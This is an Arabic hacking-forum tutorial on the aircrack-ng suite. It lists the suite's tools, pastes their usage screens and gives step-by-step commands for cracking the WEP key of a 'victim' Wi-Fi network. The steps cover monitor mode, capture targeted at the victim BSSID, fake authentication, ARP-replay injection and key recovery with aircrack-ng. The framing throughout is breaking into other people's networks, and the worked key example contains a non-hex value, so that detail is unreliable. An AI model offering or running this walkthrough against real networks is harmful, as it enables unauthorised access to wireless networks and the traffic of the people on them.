بسم الله و السلام عليكم ورحمة الله
جميع الحقوق محفوظة
لا نقبل اي نسخ دون ذكر الكاتب مع المصدر (جيوش الهكر)
اليوم نشرج فقط aircrack-ng
و تنقسم هذه الاداة الى :
Aircrack-ng suite
airbase-ng -- Multi-purpose tool aimed at attacking clients as opposed to the Access Point (AP) itself.
aircrack-ng -- 802.11 WEP and WPA/WPA2-PSK key cracking program.
airdecap-ng -- Decrypt WEP/WPA/WPA2 capture files.
airdecloak-ng -- Remove WEP Cloaking™ from a packet capture file.
airdriver-ng -- Script providing information and allowing installation of wireless drivers.
airdrop-ng -- A rule based wireless deauthication tool.
aireplay-ng -- Inject and replay wireless frames.
airgraph-ng -- Graph wireless networks.
airmon-ng -- Enable and disable monitor mode on wireless interfaces.
airodump-ng -- Capture raw 802.11 frames.
airolib-ng -- Precompute WPA/WPA2 passphrases in a database to use it later with aircrack-ng.
airserv-ng -- Wireless card TCP/IP server which allows multiple application to use a wireless card.
airtun-ng -- Virtual tunnel interface creator.
easside-ng -- Auto-magic tool which allows you to communicate to an WEP-encrypted Access Point without knowing the key.
packetforge-ng -- Create various type of encrypted packets that can be used for injection.
tkiptun-ng -- Proof-of-concept implementation the WPA/TKIP attack: inject a few frames into a WPA TKIP network with QoS
wesside-ng -- Auto-magic tool which incorporates a number of techniques to seamlessly obtain a WEP key in minutes.
Other tools - WZCook and ivstools
و هذه دورة باللغة الاجنبية انصحكم بها
http://www.youtube.com/channel/UCs X...oK Ag/v ideo s
طبعا هذا لا يعني اني لن اشرح الادوات ... لا لا راح اشرحها بس مو كلها بس المهم
اهم اداة من ادوات ايركراك هي :
airmon-ng
airodump-ng
aireplay-ng
airdrop-ng
aircrack-ng
اول اداة ... هذي الاداة من اهم الادوات و لو من دونها لايمكن عمل اي شي
هذه الاداة لو كتبت في ال"الطرفية"(terminal) و تكتب "airmon-ng" راح تلاحظ يكتبلك كروت الوايرليس الموجودة عندك
الدرس الثالث الحرب الاكترونية
الان تلاحظ وجود wlan0 و هذه كارت الوايرليس تبعي لو مكانش موجود اي كارت واير ليس هذا لازم تدخل عل درس حل مشكلة الواير ليس و انشاء الله في الدرس القادم
والان حتى نبدي نخترق الوايرليس لازم نعرف انو الكرت الشبكة كبيرة و راح نعملها فرع
تسالون كيف اقولكم راح نكتب بالترمنال "الطرفية"
airmon-ng start wlan0
راح تلاحظ الصورة التالية
احنة الي يهمنا اخر سطر و الي هو "monitor mode enabled on mon0"
تمام الان ننسى wlan0 راح يكون كل شغلنا عل mon0
الان عملنا شبكة فرعية لسهولة العمل
خلص شغلنا عل airmon-ng
نجي عل airodump-ng
هذه الاداة وضيفتها اختراق الاشبكات + عرض الشبكات الموجودة حولك مع كل المعلومات
الان شوية ندرس الاداة لانها مهمة جدا
نكتب في ترمنال"الطرفية" airodump-ng
________________________________________
Airodump-ng 1.1 - (C) 2006-2010 Thomas d'Otreppe
Original work: Christophe Devine
Aircrack-ng
usage: airodump-ng <options> <interface>[,<interface>,...]
Options:
--ivs : Save only captured IVs
--gpsd : Use GPSd
--write <prefix> : Dump file prefix
-w : same as --write
--beacons : Record all beacons in dump file
--update <secs> : Display update delay in seconds
--showack : Prints ack/cts/rts statistics
-h : Hides known stations for --showack
-f <msecs> : Time in ms between hopping channels
--berlin <secs> : Time before removing the AP/client
from the screen when no more packets
are received (Default: 120 seconds)
-r <file> : Read packets from that file
-x <msecs> : Active Scanning Simulation
--output-format
<formats> : Output format. Possible values:
pcap, ivs, csv, gps, kismet, netxml
Filter options:
--encrypt <suite> : Filter APs by cipher suite
--netmask <netmask> : Filter APs by mask
--bssid <bssid> : Filter APs by BSSID
-a : Filter unassociated clients
By default, airodump-ng hop on 2.4GHz channels.
You can make it capture on other/specific channel(s) by using:
--channel <channels>: Capture on specific channels
--band <abg> : Band on which airodump-ng should hop
-C <frequencies> : Uses these frequencies in MHz to hop
--cswitch <method> : Set channel switching method
0 : FIFO (default)
1 : Round Robin
2 : Hop on last
-s : same as --cswitch
--help : Displays this usage screen
No interface specified.
______________________________________________
خخخخخخخخخ اكيد الكل ميفتهم .... هسة افهمكم المهم بس
لو تكتب في ترمنال
airodump-ng mon0
راح يعرضلك الشبكات الموجودة حولك
مثال :
لون الاحمر هو اسماء الشبكات الموجودة حولك
لون الاصفر نوع تشفير الباس
لون الازرق هو ماك ادرس حق الراوتر
لون اخضر هو بوكيت المرسلة والمستقبلة و الضائعة
لان نشرح الوردي و الازرق الفاتح
راح تشوفون مكتوب bssid و station
الاماك ادرس الموجود في الازرق الفاتح هي راوتر
و الماك ادرس المجودة في لون الوردي هي اجهزة موجودة عل هذا الراوتر مثلا انا ماك ادرس راوتري عليها جهاز واحد وهي جهازي
المهم خلصنا من هذا نجي عل امر غيرها و هي لو كتبنا في ترمنال
airodump-ng --channel [Victim channel] --write [NAME] --bssid [Victim BSSID] [your interface]
الان هذه طريقة جلب باس لكنها تكون مشفرة
تكتبون بدل هذه الكلمات حسب نوع الشبكة الي حولك
نسيت اخبركم عن كيفية استغراج [Victim channel] و هي تكون بين لون اصفر و الازرق تكتب تحت CH
و ثاني شي [NAME] نكتب هون اي سم تريد بس يكون ما فيها فراغات
و ثالث شي [Victim BSSID] نكتب الماك ادرس حق الراوتر
و رابع شي [your interface] نكتب اهنا mon0 نكتب النت الي عملناها فرعي و دائما تكون mon0
مثال : airodump-ng --channel 11 --write shayar --bssid 11:22:33:44:55:66 mon0]
الان نضغط انتر
و نفتح ترمنال جديد
و الان نروح عل اداة aireplay-ng و نكتبها في ترمنال اسم الاداة
Aireplay-ng 1.1 - (C) 2006, 2007, 2008, 2009 Thomas d'Otreppe
Original work: Christophe Devine
Aircrack-ng
usage: aireplay-ng <options> <replay interface>
Filter options:
-b bssid : MAC address, Access Point
-d dmac : MAC address, Destination
-s smac : MAC address, Source
-m len : minimum packet length
-n len : maximum packet length
-u type : frame control, type field
-v subt : frame control, subtype field
-t tods : frame control, To DS bit
-f fromds : frame control, From DS bit
-w iswep : frame control, WEP bit
-D : disable AP detection
Replay options:
-x nbpps : number of packets per second
-p fctrl : set frame control word (hex)
-a bssid : set Access Point MAC address
-c dmac : set Destination MAC address
-h smac : set Source MAC address
-g value : change ring buffer size (default: 8)
-F : choose first matching packet
Fakeauth attack options:
-e essid : set target AP SSID
-o npckts : number of packets per burst (0=auto, default: 1)
-q sec : seconds between keep-alives
-y prga : keystream for shared key auth
-T n : exit after retry fake auth request n time
Arp Replay attack options:
-j : inject FromDS packets
Fragmentation attack options:
-k IP : set destination IP in fragments
-l IP : set source IP in fragments
Test attack options:
-B : activates the bitrate test
Source options:
-i iface : capture packets from this interface
-r file : extract packets from this pcap file
Miscellaneous options:
-R : disable /dev/rtc usage
Attack modes (numbers can still be used):
--deauth count : deauthenticate 1 or all stations (-0)
--fakeauth delay : fake authentication with AP (-1)
--interactive : interactive frame selection (-2)
--arpreplay : standard ARP-request replay (-3)
--chopchop : decrypt/chopchop WEP packet (-4)
--fragment : generates valid keystream (-5)
--caffe-latte : query a client for new IVs (-6)
--cfrag : fragments against a client (-7)
--test : tests injection and quality (-9)
--help : Displays this usage screen
No replay interface specified.
طبعا الي يريد يدرس الاداة يقراها و احنة الي نريدها اختراق و راح ندرس الي بس نريدها
aireplay-ng -1 0 -a [Victrim BSSID] [your interface]
طبعا عارفين [Victrim BSSID] هي ماك ادرس حق الراوتر
و [your interface] هي mon0
الان نفتح ترمنال جديد
و
aireplay-ng -3 -b [Victim BSSID] [your interface]
ما راح اعيد و هيك يكون خلصنا جزء الاول نجي للجزء الثاني
و هي فك التشفير
الان لو فتحت مجلد root راح تلقا فيها ملفات جديدة
و الملفات مسمى عل الي كتبناه في [NAME]
هذه ملفات مشفرة تحتوي عل الباس نروح الى اداة aircrack-ng
و هذه الاداة يقوم بفك تشفير الباس او الملف بامدادات cap
و نقوم بكتابة
aircrack-ng -b [victrim bssid] [*.cap]
راح تلاقي الاداة يكشف التشفير
و راح يكتبلك
key found
و تلاحظ مكتوب الباس بين قوسين و انت شيل : و يصير الباس يعني مثلا انا طلعلي 11:33:44:88:sf:99
يعني الباس حق الشبكة هي sf9911334488
و خلص درسنا و الحمدالله
اخوكم شايار
للاستفسار :
[email protected]
جميع الحقوق محفوظة ...الدرس الثاني ... الحرب الاكترونية